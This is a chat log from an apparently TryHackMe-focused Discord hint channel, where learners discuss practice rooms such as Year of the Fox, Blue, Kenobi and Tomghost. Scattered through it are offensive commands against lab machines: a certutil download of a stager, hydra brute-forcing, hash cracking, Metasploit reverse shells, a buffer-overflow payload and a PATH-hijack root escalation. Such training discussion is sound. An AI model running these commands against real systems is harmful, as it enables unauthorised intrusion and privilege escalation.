#room-hints

Intro to python, how to decode the flag file?

The room suggests you read the docs for the Python base64 module

do i need to write the code?

Have you done that?

Yes you need to write code to do it

i did..still can't come up with a correct code

You need to write a whole program to do it.

It will be 3 loops

Each loop does a different decode

And you will use the base64 module, and 3 functions from that module

i did three separate functions..

Maybe you can do that. But you should really be using loops.

You don't need to define your own functions here

gotcha thanks for helping!

The order given is the order used to encode

i decoded it by each line.. but i got error saying :

There's only a single line

You need more than hints now

#room-help and show code

ok

Hello, i'm doing the Break Out The Cage room and i have managed to find the ||hidden message in the audio file using the spectrogram|| but can't actually ||see what it says||, can anyone help me?

scroll

I have, but still can't ||make out the last 3 letters||

||nameless***||

Should be able to scroll along

i'm not entirely sure what you mean, can i dm you an image?

I have DMs off

is there a way i can put it in this channel without spoiling it for anyone?

I don't remember an audio component to Break out of the Cage....

There is.

Odd

@void cedar Will turn DMs on.

DM

Thank you

In the burpsuite room the #5 in the decoder and comparer.
" What can we load into Comparer to see differences in what various user roles can access? This is very useful to check for access control issues."

Not really sure what it is asking for here.

sigh.. figured it out.

On PS Empire room, trying to get the .bat listener onto the windows machine. Dunno why we set the listener to port 80 because now it’s in use and I can’t set a python http server so I could use certutil to download it

I could just use a meterpreter reverse shell and use download commands, but that feels cheat. Is there another way?

That’s not cheating. You could just set up a server on a different port and then download from that instead. You have 65000~ ports to choose from to do that kinda uploading/downloading thing 🙂 @exotic rose

65535 to be precise

65534 if one is already taken 👀

Hmm I tried hosting a python -m SimpleHTTPServer 5555 in my tmp directory with the file in it

On the windows side, did certutil -urlcache -split -f http://myip:5555/launcher.bat launcher.bat

Said the urlcache command failed

Any thoughts?

certutil.exe

See if that helps

Did not work

You think port 5555 is blocked?

When you get an error, screenshot the error if you want help with it

Also tried with just certutil

a connection with the server could not be established that sounds like network issues to me

Your IP being your VPN IP?

Yup

Wait...

I missed a number😂😂😂

It works 😂

Thank you haha

nice

Any pointers on command injection for yotf?

@stuck fractal ?

@regal comet Boi.

Don't just ping me because you need help

If I could help you, and if I wanted to help you, I would have

I was under the impression this is a teaching place

Yeah

I guess paying for this service means nothing here

That doesn't mean I've done every box

I don't get paid to help you

Hell, I don't get paid to do anything other than make boxes

not you, me. paying to be a sub

I can't give you a hint if I don't know one.

but that's all you got to say

Being a sub doesn't mean you can get hints for a box that very few people have done, where the creator has given very few hints

The hints don't exist.

You can't have something that doesn't exist.

would be nice to hear that instead of being ignored.

not asking for anything more

I mean, it wouldn't have contributed. At all.

Doesn't contribute = no reason to answer.

I guess paying for this service means nothing here
@regal comet correct. It's a community discord. Subbing means stuff on the site -- and it means you have a couple of extra channels in the discord, but otherwise it's not worth anything in the community 🙂

Someone else might want to give you a hint

And yeah, this is a volunteer job for us. There is no obligation to help, and in the end, there are 17 people who could help with that box, out of 900 in the room

Most of them aren't here 🤷‍♂️

I am not upset for not getting help. I am annoyed that I am being ignored. that's all.

but its all good

Wonderful. In that case I'm going back to sleep 😄

hi there

anyone able to help me with the room attacking kerberos?

https://tryhackme.com/room/attackingkerberos

for task 4 i am using the password list provided to crack the hash but it seems that the hash is not in the password list

If it says it is, it is. Your syntax is most assuredly incorrect

i am pretty sure it is correct

the syntax was just copied from the tutorial

this was given in the challenge

hashcat -m 13100 -a 0 hash.txt Pass.txt

i just followed it

I used John for that to be honest.

But that's because I don't have a GPU on this machine.

i dont have GPU as well

but the password list is small enough

like 1200 lines

Just use John.

¯_(ツ)_/¯

alright gonna try that

did you properly format your hash Rubeus is weird and doesn’t like to output hashes that hashcat likes

I forgot about that part. I remember having to delete all that white space from each line because of it.

thanks mayor

john worked fine

i was using impacket

so the hash format was normal

unlike with rubeus

anyone able to advise real quick on YOTF? ||is the command to bruteforce hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f -I -V -t 64 10.10.141.224 http-get / ||mainly wondering if the syntax is right..... it goes blindingly fast (obv because i put 64 threads) but not sure if i am doing this right

I mean. If you get the right username, that might give you a password

okay, thank you. will try harder

@inland onyx can I DM quick?

@wraith fulcrum what for?
(Thanks for asking btw 🙂)

Hi everyone, can I have some help on poloprivescfinal

Task 6.2... It's looking for a keyword but I don't know what it wants

@wraith fulcrum what for?
(Thanks for asking btw 🙂)
@inland onyx sudo related

pwfeedback

Uh...
I mean, if it's asking for help with something then doing it here is fine, otherwise sure 🙂

https://tryhackme.com/room/commonlinuxprivesc

6.2 Having read the information above, what direction privilege escalation is this attack? (8 letters)

have you done all the previous tasks?

the answer is in the long block of text 😛

can someone please tell me how do I connect smb .. in yotf.. I got the username and password.. I am using smbclient but I can't

@indigo ridge you also need a share ..

can you show the command you're entering that's not working @indigo ridge? If we can see it we can help better

for yotf i managed to decode both files and got some kind of hash but cant cracked is it a rabbit hole ?

let's just say that I wish i hadn't spent as much time as I did on them @radiant violet 🙂

is the password for the f** user changed ?

in Year of the Fox

?

can you show the command you're entering that's not working @indigo ridge? If we can see it we can help better
@median compass smbclient -L \\ip\yotf -U fox

your slashes are backwards @indigo ridge

I searched it on google.. is this for windows?

yes @echo thunder every time you reset the box the passwords change, at least some of them

ok

probably @indigo ridge I only use it on linux, on linux it's / not \

i assume your attack box is linux?

yes kali

oh, hang on, you also are mixing up two commands

smbclient -L is to list all shares, then you can't give it the /yotf part as that's a share

if you just want to login then leave out the -L

ohhh.. that's why It only lists the shares yotf and $ipc

is this correct
smbclient ////10.10.106.80//yotf -U fox

i would have thought that just smbclient //10.10.106.80/yotf -U fox would work

I entered this.. It asked for password..
smbclient //10.10.106.80//yotf -U fox
tree connect failed: NT_STATUS_BAD_NETWORK_NAME

you have // before yotf

thankyou very much brother..

you have // before yotf
@median compass it worked

happy hunting

I am connected now

🤩

whatup ppl?!
somebody familiar with the "Advent of Cyber" room/Hackivity?
I'm kind of struggling with Task 6 (#3)
any hint (or help) would be great.
BTW I'm new at TryHackMe ..
thanks in advance

whatup ppl?!
somebody familiar with the "Advent of Cyber" room/Hackivity?
I'm kind of struggling with Task 6 (#3)
any hint (or help) would be great.
BTW I'm new at TryHackMe ..
thanks in advance
@jade plover have you decoded the cookies?

notice the decoded cookies it has some pattern

thnks for reply... I did

what did you get?

fixed part of cookie is:
v4er9ll1!ss

if you found the pattern then it is same for every user.. try to create the cookie for admin

fixed part of cookie is:
v4er9ll1!ss
@jade plover yep fixed part is this.. you have to decode it.. use burp suite or try to find the encoding.. I suggest use burpsuite

help blue room

using Burp or without?

its showing error cant handle

using Burp or without?
@jade plover with burp

help blue roo,

help blue room

help blue room
@cold tulip whats the error?

its showing cant handle while exploit

@indigo ridge Thnx man 😉

its showing cant handle while exploit
@cold tulip I suggest you try it 2-4 times

its just straight forward exploit

wait

help with rhosts

what we have to do

set the remote host.. means your room's ip address

the error is its running session -u 1

help with 3

@cold tulip you're really not making it easy to help you, try sending a picture of what you're doing and explaining clearly what's going wrong

ok

help with 3 what we have to do in 3

you mean Task 3 in room Blue then?

ok
@cold tulip I think you are having problem with metasploit.. I would suggest you should complete the metasploit room first

ok, so you type options and you see a SESSION option
then you type SESSIONS and you should see your sessions listed, you probably just have 1, it's probably number 1, but it could be another number if you've tried a few times
then you do set session 1

make sense? darkrider's suggestion to do the metaspolit (https://tryhackme.com/room/rpmetasploit) room is probably a good one, it's a useful tool and worth getting a good grounding in

the answer is in the long block of text 😛
@ripe hedge I got it now, thanks!

https://tryhackme.com/room/lazyadmin

Can I also get a little help on this one. I found 2 hidden directories and cracked a hash. I'm stuck on finding an email address to log in with

there is no email

u just need username

got it!

thanks

hey guys

"There is no spoon..."

@indigo ridge so wise.

Hi God

@indigo ridge so wise.
@velvet wharf ??

anyone completed the yotf room

?

a few have, but I doubt that they're talking much 🙂

It was like less than 20 people or something last night.

it's a hard room

can anyone give me a hint on how to find the web user for yotf?

As they answered you right above only some 17 people have completed the room and they’re probably not gonna give out hints

enumerate harder I guess?

In yotf room I got the web user and can ||upload/download files to the server. Ping my own machine|| but any hints pointers as to get a bit further ?

need a hint in the "rp: burp suite" room, task 10, can't seem to find any request that gives me a "set-cookie" header

it's a response that sets cookies

@mild eagle sounds like a job for a reverse shell...

I haven't gotten that far yet 😦

@ripe hedge tnx Also the path I was heading down but not that easy !

I have a web user...and not much else

is the hash in the c*****.txt encoded multiple times

?

is the hash in the c*****.txt encoded multiple times
@echo thunder yep

ok thanks

can I PM you

I want to ask you something

it won't help i havnt completed anything in it

but you can pm me

haha

I haven't gotten quite that far yet

just smb..and lurking to get http user pass.

I got a user

thats great..

any hints for Offline KOTH

Hi, I doing the CTF daily bugle and I have a shell on the machine, now I have found the file where the password stored under Webserver path but I can't SSH to the machine with this password, can someone help me?

I haven’t done that machine in a while but that doesn’t sound like the correct path to me

anyone decrypt the text inside the two txt files on yotf?

Nope

can you please ping me?I have a question regarding encryption

Literally no one has

Because you can't

Because a) Not encrypted

it is a ||base32|| text

I mean

It's not encrypted

Nothing about it is encrypted

Even once you decode, still not encrypted

first time is like that

than it gives me another time

wat

the text from the files

They are sha256 hashes

have fun

it is first ||base32|| and than ||sha256||

😂

have fun
@stuck fractal

it is first ||base32|| and than ||sha256||
@echo thunder this won't get you anywhere

Muir told us about the creds files in yotf, they are /dev/urandom|sha256|base32, just meaningless noise

forgot the SHA256 part 🙂

that was days of my life btw, horror show those redherrings!

@median compass did you finish the room

?

yes, finally

can I PM you

?

i imagine if there was 17 people that did it then i'm the 17th lol

regarding the yotf

?

sure

Help in authentication-2 jwt

help flag2 in blue

please

same feedback as the last time @cold tulip, when you don't show us what you're doing or what you're stuck on it's hard to give help

i imagine if there was 17 people that did it then i'm the 17th lol
@median compass 15 (16 now). Plus Pars, testing it, and me, making it

well that's top-20 Muir, I'll take it 🙂

@cold tulip Don't show flags.

oh

okay

but help

Do you know where the flag should be?

Read the hint on the room. Where does windows store passwords (as a file)?

no

no

no

@cold tulip Well, I recommend doing some research and finding that information.

my system is trying hard to crack hash from Daily Bugle but getting hot and nothing else, any known issue or i should choose any not-so-famous wordfile.

rockyou will do it

It takes time

thanks @stuck fractal oh, i am missing my graphic card then.

Bcrypt doesn't care about GPUs

Bcrypt doesn't care about GPUs
@stuck fractal cool to know again thx. looks like i need to retouch GPUs contribution in calculations. Any reference you wanna share.

Bcrypt is just designed to not care about GPUs

The speed is about the same

that 2 js files are pain in the arse

dude no file

in config

wat

You probably just don't have permissions to view it

migrate to a system process

oh

ok

failed

?

I have problem with escalating privs to administrator on Retro. I know which exploit use but im stuck on last step. I tried few thigs to fix it but they doesnt work

that priv esc is intended to be hard

@delicate plaza Check the pins in #650425164894568455

hey guys, just wondering if there's a directory in windows where you can download a file without getting errors like 'Access Denied' because i have no write permissions. So like in linux i could download a file to /dev/shm and get no errors?

google windows world writeable dir

ok thanks didn't know exactly how to word that

hey @stuck fractal so after trying to download the PowerUp.ps1 file to Useraccount\APPDATA\Local\Temp i still get access denied

i'll post some screenshots

Try a different directory

And just because I helped you once, doesn't mean you need to tag me the next few times

So

Try a different directory

ok sorry about that

There's one that's pretty much always writeable by everyone

Public?

I found one in a single google search

i'll just keep looking, sorry for tagging

could you tell me what you typed in on google ?

i seriously can't find anything

Normally C:\Windows\Temp

i got access to this path is denied?

Eh, look in more places

What box?

you're probably told where

Corp? pretty sure you're told

the room is Corp Task 4

We will run PowerUp.ps1 for the enumeration.

Lets load PowerUp1.ps1 into memory.

Into memory

Not onto disk

but don't i need to download the file first?

or is it already in windows?

You're loading it into memory

Not onto disk

You don't touch the disk

https://tryhackme.com/room/hashingcrypto101 task6 1st ques I'm not able to find sha1sum the kali site only lists sum for latest 2020 versions not 2019

@eternal brook Try harder

They're there

You need to find the 2019.4 image

https://fleschutz.droppages.com/downloads/SHA1.txt found this site

I mean

That seems unrelated

but it does not match

Like totally unrelated

Find the official kali 2019 ISO download

BTW i realised what i'd done cheers as always 👍

again im quite newbie when it comes to windows

The worst in Retro is that i have setup thing and when i wanna open other thigs it starts via thing which i setup for it but in eop it still dont want to ._.

see it has only the latest versions when i looked for older versions it does not have the checksum in it

@eternal brook You can find it

You need to do research

https://www.kali.org/news/kali-linux-2019-4-release/

It's not directly on the page

hmm ok

It comes under rule 13

I made sure of that

okay i'll try searching more thanks

I have a question for y'all, what do you guys tend to look for after finding an LFI vulnerability?

Unless that's for a specific THM room, wrong chat

nunu

it's not for a room, it's for a hint in general

If it's not for a hint for a THM room, it doesn't go here.

For those who want only hints on rooms

ok

Can i dm someone who pwn Retro with question if im doing box right ?

@delicate plaza can I dm u?

yup

I just wanna be sure if im doing something wrong or if machine is broken 😄

Or just screen to confirm if something should appear or not

So I think I found the way to root before the way to ||jjameson|| on Daily Bugle lol, I did see ||/var/www/html/libraries/joomla/http/transport/cacert.pem|| through linpeas, but having trouble finding out ways to exploit it. Any tips on moving from ||apache|| to ||jjameson||?

Look around for possibly some || plaintext credentials || 🙂

@robust nymph also look closer at your ||linpeas output|| and I think you may find something interesting

I'll definitely do some digging and get back to you, thanks!

Ahh shows that I need to look at my ||linpeas scans|| more in depth, very well hidden in there. Thanks again for the tip!

any time

And sure enough the way I found to root worked as soon as I pivot over, Very awesome box!

Daily Bugle is one of my personal faves.

I have a single problem with it

Hello guys, I just have a quick question about skynet, I'm new and I wouldn't want to start spitting spoilers even though there's a walkthrough. Would anyone be able to help me?

Hi Princess. Best bet is to ask for a hint specifically. You can include what you're currently stuck on, and what you've tried unsuccessfully.

If there is anything we consider a spoiler we can ask you to remove, or have it removed if needed. 🙂

ok! this is for the oscp room, I found the directory for "My dyson" and connected to it, but when I do an ls I do not find anything about his wife or content management

just a whole bunch of pdf info

So if I remember correctly there are a few different directories there to go through.

||download them to your Kali machine to go through them easier||

I would also check the other shares.

For yotf room. I found the web user. Maybe someone is able to give me a hint on the box. || I am not sure how to execute commands in the form I found. I tried injecting the POST request using Burp, but I am not able to execute commands or perform LFI.. ||

ok, I read the l*gs and already logged into smb and Mr dyson

Ok, but you have what you need from the logs. Don't get bogged down in the shares too much. Go back and scan/enumerate some more to find additional services you may be able to take advantage of.

If you have access to Miles share, that's the other half of the challenge.

Now put together what you found in the ||anonymous share and in Miles' share||.

I so need a hint please with a linux challenge. [Task] #10 . part 3 regarding split. i do not understand and from the hint that was suggested i can use sed and i just dont see how that is possible?

@craggy owl the man page for sed or google is your friend here for what you need

that's the thing, miles share only has titles of pdfs

I know that if I say more it's going to sound as a spoiler and I could get banned

@white salmon I don’t believe that’s the case. Enumerate harder

😦

You can put || on both sides to censor your text

|| spoil me ||

I'm such a noob

Example ^

||y'all are awesome||

We all started there at some point no worries

@white salmon Just don't post answers/flags directly.

We don't enforce spoilers other than "Be a decent human"

Does anyone remember what smb enuumeration cheat sheets they used? obgviously I'm googling wrong! and I'd like to be able to find the answer myself 😦

Cheat sheets I haven't seen

Tools, I have

||so obviously I've done smbclient \\10.10.58.81\milesdyon with the pass I fouund in squirrelmail||

and then ||smbclient -W WORKGROUP -U milesdyson //10.10.58.81/milesdyson ||

and I get access!

but I do not know how to enumerate more from there 😦

Look around?

Try the password on a different service?

i so need a mentor if one can help me. i just want to learn and have a passion again to code and i want to keep it going... sorry if this is the wrong room im just asking for help in learning..

This is the wrong chat.

And that's not what the community mentors are for.

sorry where should i send this to?

oh .. sorry i thought it was for that

Mentors offer specific help with rooms or the VPN.

yes i have a questino about a room

If you want to find people to learn with, #689615473620287603

If you want help with a room, #room-help

If you want a hint with a room, #room-hints

okay.. i have been there but seem not to get help but i am still all new and will figure it out

sorry

||I'm really sorry, it's just that it has already been 3 days and there is a part that says "let's log into Miles share" and even though I'm already logged in with username and password, I cannot get it to match what the walkthrough says||

head to #room-help and show a screenshot of the share

@white salmon, it's very annoying when you're trying to solve a hacktivity and you find out the problem is not your skill, it's a bug in the room.

This wasn't an issue with the room in this case

No, this was me being stupid :/

I was getting the letters N and D confused

Which room are you doing?

It's solved, but Skynet

Ah, okay, just wondering.

I'm trying to do the room Agent-Sudo and it's asking me for a zip file password in task 3 question 2. But I can't find it in the FTP service.

I can only see a .txt, jpg and png.

Hmm, what about hiding files in images?

(I might be wrong, it's been a while)

I have used Stegcracker on cute-allen.jpg but that didn't give me a password.

I mean, have you tried something like stegoveritas to see if there is even anything there?

Would steghide suffice?

Stegoveritas detects steghide, that's the goal

It does a bunch of steg detection and extraction techiques

Hey, I am going through BP Networking and I'm having a very difficult time finding the answer to
A third predominant address type is typically reserved for the router, what is the name of this address type?
I've tried numerous answers but I can't seem to find any information, can someone point me in the right direction?

ipconfig in windows will tell you it

Oh I don't have a Windows machine

I'll try it in wine

Ok nvm I'm dumb, thank you!

You’re not dumb

yeee I knew it once I saw it, just couldn't think of the word lol

I just extracted cutie.png with stegovertias but nothing of interest in there.

Don't worry. I'm really stupid.

-.-

You’re not

Hey guys, I hope you can help me. i'm stuck to the answer in CC: Pen Testing: Task8 #7 What option sets the architecture to be exploited? It's 4 characters and I'm a bit confused, 'cause i tried everything.

hi!
i'm stuck for a long time in linux challanges flag 26 (
Find flag 26 by searching all files for a string that starts with 4bceb and is 32 characters long).
I tried to do all kinds of command variations and nobody worked for me .. For example:
||grep -x '. \ {32 }' / * -R -s 'Permission denied' -i '4bceb'||
I would love for hint to tell me what I'm doing wrong, thank you!

hello everyone, I'm stuck on ICE today https://tryhackme.com/room/ice

Hi Guys,
Anyone has an idea on the Network Services room Task 4 #8
I already have the id_rsa, where do I need to pass it? Been stuck for a while.

For ICE, MS17-010 looks promising but, it can't find a pipe using both py and msf exploits

The recommended Icecast msf module doesn't work off the bat. A listener is created but nothing connects back

@velvet wharf task #3 question 2?

you need to enter a cve there

that works

Task 7 Q 7

they link you the exploit-db

i don't think ice is about ms17-010 at all

I was just trying other angles

ah ok

they are talking about the icecast msf module but i cant get that to work

im doing that one right now

and have teh icecast one woking

am I missing something? use exploit/windows/http/icecast_header
set LHOSTS x.x.x.x
set RHOSTS x.x.x.x
exploit

Started HTTPS reverse handler on https://10.8xxxxx
[*] Exploit completed, but no session was created.

i changed the payload

that one is buggy for me aswell

let me try

ah OH, that works

just used a win shel rev

thank yo

you might wanna try the windows/meterpreter/reverse_tcp

np

gl!

i can upgrade from in the shell

I'll try that too

i have a gcc question too. I tried doing it without MSF and I downloaded 573.c ant then ran
gcc -o 573 573.c
chmod +x 573
./573

and it says:
Failed to execute process './573'. Reason:
exec: Permission denied

have you seen that before? Also I'm using fish. Not sure if that makes a difference

no clue

Ok, I'll mess with it later. Thanks for the help

Is that the way you’re supposed to compile it? Read the exploit it might not be

it is

the payload sucks tho

😠

Interesting

been trying to generate my own with msfvenom

but none will stick

tried bind / reverse /add user

Yotf Got access revershell and did some enumeration and found something interesting but need a hint to exploit after I got a reverse shell. Lets say || there is a difference in local ports and public ports||

sounds like you're on the right track @mild eagle

what would you do to a port ||if you could see it from your attack box?|| then think about how to do that in your case

@median compass yes i just dont know || how to proxy that port to my attack machine - my Google fu is weak today||

you could look at ||socat|| or perhaps ||upgrade your shell to meterpreter and look at the options baked into that||

||i just wanted to join ||in ||on the spoiling fun|| 👀

@median compass tnx Think that will get me a bit further

I also got access to that port but still dont know what to do with it

@median compass || could it be something with portfwd been struggling to "the do the thing" once I've used that cmd||

@prisma bronze yotf ??

Hi can anyone guide me in the BP Networking room. I'm stuck only 1 question in the entire room.

"Of these addresses two are reserved, what is the first addresses typically reserved as?"

@halcyon pumice research what the 2 reserved IP addresses are in a network

solved it

thanks!

don't spoil the answers @halcyon pumice

hint on tomghost? I ||rerouted the tomcat server (on port 8009) so that i can log in locally, but its not default credentials (that I can find)|| is that the right port to try to exploit or should I try ||port 53||?

what are usually some default credentials @oblique cliff

||https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown||

^

it only prompts me for a password though

there is a specific exploit you need to use for it

it's in the room header, or whatever is called

i cropped it out. have a look there

thanks 😄

no problemo

@ me if you get stuck again

it gets a littleharder after the foothold but should be manageable

gotcha, turns out thats the exploit i was trying i just couldnt get it working, ill #tryharder

but i have to eat dinner now so may @ you in awhile

^^

you're missing something most likely

alrighty i tri hard first

go

@past night im an absolute moron

the reason it was giving me only an option to give a password is cuz it was asking for my kali password to get permission to start a service lol

but it was right other than that stupidity

slowclap

We all make mistakes, don't beat yourself up over it

its ok im tough enough to fight back

well, as i usually say 'I am the mortal instrument of my own death'

excuse me mr mortal instrument of your own death @past night , but the ||usual tomcat default credentials dont work and those have never failed me for tomcat|| so i am both disheartened and lost

Is this ghostcat?

Oh Tomghost.

Same thing.

What have you tried so far Bob?

@oblique cliff

I've tried the usual ||tomcat default creds list|| but that didnt work, so i tried brute forcing with rockyou with username ||admin|| but nothing after 5 minutes so i stopped that one

Tomghost isn't a typical Apache site.

Tomcat*

and then I found exploit ||48143|| but i cant get it to work

Ok, so you found the CVE

yea, unable to get it to work unfortunately

How did you attempt to run it?

maybe i should run it ||against the remote machine|| ill try that

Not sure why you went to that length.

What's your machine IP?

Like the THM

10.9.1...

||python 48143.py ipaddrhere||

but i can access tomcat on localhost rn cuz i set it up that way

Try it my way and see what you get. 🙂

😢

sadness

thank you

Also, the vulnerable service isn't actually on port 80. You're looking at the ||ajp|| service, which is on 8009.

right, but I ||was forwarding it to my local machine on my port 80||

This isn't an exploit that is like that. It's mostly a file read vulnerability.

because I was ||forwarding it|| or whatever it is im actually doing with the service I thought that ||i would have to exploit it through my machine|| hence using ||that IP|| when doing that

It's more of a file content disclosure vulnerability. Maybe there is a way to exploit it like that, but I'm personally not aware of one. And in the case of this machine, they are looking very specifically for the output that comes from that exploit being run correctly.

I get that, but I thought the exploit was going to take advantage of tomcat, which is either being run on the remote machine port 8009, or my machine port 80

i guess i overthought it

but anyway, thanks ^^

wait so did I not have to set up this forwarding at all?

Not really. It's exploiting the Jserv service, not Tomcat.

No forwarding necessary.

oh thats actually kinda funny, cuz ive been brute forcing this since i set it up to forward to me, so i thought thats what i was supposed to be doing haha

Not in this case. But that's interesting thinking.

damn, went down an unintentional rabbit hole 😆

https://tenor.com/view/congrats-djkhlaed-player-yourself-foolingyourself-gif-4961672

have a djkhaled for yourself @oblique cliff

brutal

i use any occasion i can find for this gif

i'm sorry it had to be you this time

its ok i deserved it

alright back at it, still fumbling around as user... i assume I need to find ||a password somewhere to decrypt this pgp file||, but hunting around couldnt find anything. Hints on where to look if thats right and if not then what to do otherwise?

still tomghost^

Sure. Check the ||skyfuck directory||

Oh dur. Need to read better.

||gpg2john||

There @oblique cliff proper hint.

didnt even know that tool existed, I'm so behind the cryptography times

||use the correct file||

just so i feel better about myself i feel the need to say i did use the correct file without being prompted 👀

got root, thanks for the help mayor!!

and thanks for the wonderful motivational speeches @past night

question mayor, for something like that where I had never heard of that tool gpg2john, is there something you do to discover new tools for the appropriate situation? or is that just experience?

Think I was probably as stuck as you were and looked at the guide. No way to know what you’re seeing if you don’t know what it is or how to use it.

makes sense

thanks senor mayor. As always, you got my vote 😉

thanks!

For PS Empire stagers, what’s the difference between the BindIP and the Host? My stager works when I set both of these with my host ip, but not with just Host set

For network services room, telnet section, is the telnet port closed on purpose?

Hi Jyuken. No need to ask in different channels. When someone who sees your question can answer it, they will. The community is super helpful. 🙂

In this case, looks like you should review the room instructions. Looks like you need a port other than the typical one.

@patent token so even though the section is all about telnet, it may be a different port?

You aren't required to keep a service on it's common port.

It's actually common for network and system administrators to use obscure ports for services.

Quite common, in fact.

Oh yes understood

Thank you

You're welcome. 🙂

Maybe a stupid question but when running a portfwd from meterpreter session do the remote port need to be exposed to the outside??

i am trying to get into jack so i decided to rock with jack on a xmlrpc stage. Am i going right ?

@mild eagle if you're connected to the vpn then no it won't need to be exposed (or the THM virtual machine)

@dusky vigil okay tnx guess I must be doing something wrong the 😀

Anyone get this bug when upgrading their shell?

is rockyou okay for jack, i am bruteforcing since morning without luck

Most rooms tend to use rockyou yeah

Anyone get this bug when upgrading their shell?
@white salmon Can you share your options with us?

@keen willow Rockyou won't work for Jack.

@keen willow Rockyou won't work for Jack.
@tidal sedge I realized that, so, is finding right wordlist makes this room hard ?

or i am entirely on wrong path, I am bruteforcing coz in forum i read a shorter wordlist would work.

From my point of view, find the right wordlist can not be the sense of this room. I don't think it's the reason why it's hard.

It's a common wordlist, it's also quite small in size hence the bruteforce will be fast .

Can you tell us, which other list did you choose?

nmap.lst, john/password.lst, fasttrack.txt

next wud be wordpress-attacks-july2014.txt

@dull marlin can you please pm me some hint.

Can you tell us, which other list did you choose?
@dull marlin 10-million-password-list-top-1000.txt, xato-net-10-million-passwords-10000.txt these are currenly on work.

Anyone able to assist with the reverse engineering room? I see what it's comparing the entered value to "cmp eax, xxxxx" but when converting the "xxxxx" hex value to both base32 and base64 I'm met with an incorrect answer. Any hints/tips for crackme2.bin

On linux Challenges when trying to find flag26 i've tried running find / -type f | grep -rl "^[4bceb].{27}?" and find / -type f | grep -rl "^[4bceb]", both display the same 4 files and after manually going over them i don't seem to be able to find it, any hint to the right direction?

@thorny pond right now youre grepping the file names. you need to grep the contents of the file

I would research how to use find and then grep the contents of the files

ahhh that makes sense, thanks!

I just did agent-sudo, and even though I could only do half the room by myself, I loved it. :)
Props to DesKel

Yea I enjoyed agent-sudo as well

@proven bridge do you still accept dm for carpe diem. stuck on getting second flag 😂

There no any writeup for Year of the Fox?

Muir made the post protected to spite us. >.<

hey.. so in the latest box my exploit is working in local.. but it's not working inside the box

I added ;cat at the end. but it just breaks.

Latest box? Dave's blog?

@hasty slate

yes

I had many iterations of my exploit work locally but not on the box

Mind showing how you're passing the payload to the program?

Oh wait, I should ask what stage are you on first lol

root flag

with python..
||(python -c "print('A'*N+<payload>)" ;echo "";cat) | sudo /uid_checker||

Okie

Sooo that did not work for me no matter what payload I passed

though working in local? 😦

Yup

Pwntools was a lifesaver

Ssh channel ;)

hmm.. lol.. sorry.. but I don't know enough about binexp to grasp what u're trying to say xD i will just research and read up more

I don't know binex too, I got through this by gluing programs and looking at docs

yeah so using ssh not rev shell

I don't know binex too, I got through this by gluing programs and looking at docs
@wooden mist ohk lol

thanks 🙂

@wooden mist so one thing even in the box it goes into the required function(cause it prints the msg). But the shell is not persisted.

just wanted to mention that.

The persistence depends on your payload

oh ohk

https://offensivenoob.blogspot.com/2020/06/tryhackme.html

for year of the fox machine got user fox
is pivoting to the other user is right way to ge root?

Hi!! Anyone could help me with the Buffer Overflows room, i'm struggling with the last challenge

How a decipher the cipher.txt in the room year of the Fox ?

Advent of Cyber, day 11. Anonymous FTP. Nearly all commands give me "500 Illegal PORT command". Passive mode doesn't work either. Any ideas?

@floral olive rabbit hole

Switch vpn servers @radiant dew it’s a known bug to happen at times (:

Switch vpn servers @radiant dew it’s a known bug to happen at times (:
@steady stratus Do you mean change machine?

Ahh noo. If you look on the access page on the THM site you can change what VPN server you’re connected to

Change to a different one (I.e. from eu regular 2 to regular 1)

If it’s your first time changing over you’ll have to regenerate your config file and use that

But any further switching you shouldn’t need to regenerate it again

Awww I don't like my new IP 😦

But at least it works now, thanks @steady stratus !

Ayyy nice one hehe. It’ll take a bit of getting used too

I had something like 10.10.11.23 something near to that sequence

If I change it back to my local server, will the IP stay the same? And I can use the same .ovpn file from now on?

Your ip should remain the same and you should be able to use the same config file now yes

It’s just the one time if you need to switch servers is all (:

Soun

d

@wooden mist can i pm you about davesblog? i have ||pwntools working on local but not remote|| wanna know how did you fixed it.

Sure

Hi, can someone give me an idea regarding Intro to Python room Task #12

whats the issue?

how can i pass the result of the loop to the next loop?

save it as a variable and pas it on?

pls dont post answers here

remove that pls

and instead of print do return

why does it say return outside function?

def somefuncion(code):
  dosomething
  return value

should be inside the function

same indent

so all my loops should be inside one function?

no

ah, you have loops, not functions

i have 3 loops

am I doing it wrong

not necessarily

you need to save it in a variable tho

can I dm you real quick?

sure

Can anyone help me with JVM reversing task 6?

which room?

https://tryhackme.com/room/jvmreverseengineering

a, havn't done that one yet

Currently doing LazyAdmin. I found the user flag by spawning a reverse shell.
I see that SSH is open and I found the db credentials, but neither do I see the port for mysql open, nor I can think of a way to privesc. Any hints?

where can you login with those creds?

exploit that

oh wait you already have rev shell

enumerate

0_0

Umm..okay...lemme look around more

@real storm you don’t have a reverse shell yet do you?

If not try directory busting some more

To find where you can use those credentials

I found the login creds to the webportal, uploaded a shell and connected to it with nc

I'm gonna look into this in an hour or two, there's codechef lunchtime in 5 mins so 😛

@proven bridge do you still accept dm for carpe diem. stuck on getting second flag 😂
@eternal wadi Absolutely

Hi

just ask your question

guys

in Cicada: 3301 vol1 by cryllic, i always input ||cicada|| and ||Hm5R_4_P455mhp453!|| in the vigenere cipher but then i get ||Fe5P_4_P455jhn453!||

try the opposite way 👀

OOF

that was actually an error on my part then I was too lazy to fix it and just made it part of the challenge

crap it didnt spoil the image

@solemn smelt

use cyberchef and go the other way

the key needs to have only letters

ohhhhhhhhhh

wait

ahhh

nevermind i got it thanks

What is the 11-bit arbitration ID in Hex for the turn signals?

Hey guys, re yotf’s root flag; did anyone get it in the way that was intended? I understand the vulnerability used by others has been patched.

hey all - stuck in kenobi on the last task.
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu

When I execute the latter, I still get the standard status check message - no root terminal. I've bounced the machine 3 times and still the same results. Any idea?

Which option are you selecting?

option1

Also, make sure you are in the tmp directory when running those commands.

If I remember correctly that is what I was doing wrong when I did it.

I was afraid it'd be that simple.

Damnit! Now I'm embarrassed. LOL Thanks

Don't be. Do you understand why it wasn't working?

i had created /tmp in Kenobi's home path.

Yep. And when you were creating curl, you weren't adding it to the /tmp directory. So when you fired off the /usr/bin/menu program, it was going through that PATH, but not finding your curl payload, so it went to the next location it could be in.

So eventually it found the correct one instead.

That makes sense.

Had you declared /home/kenobi/tmp in the export PATH= statement, it would have worked if you were placing it in the /home/kenobi/tmp directory you made.

I should've thought just a little bit more about the problem and I would've caught it.

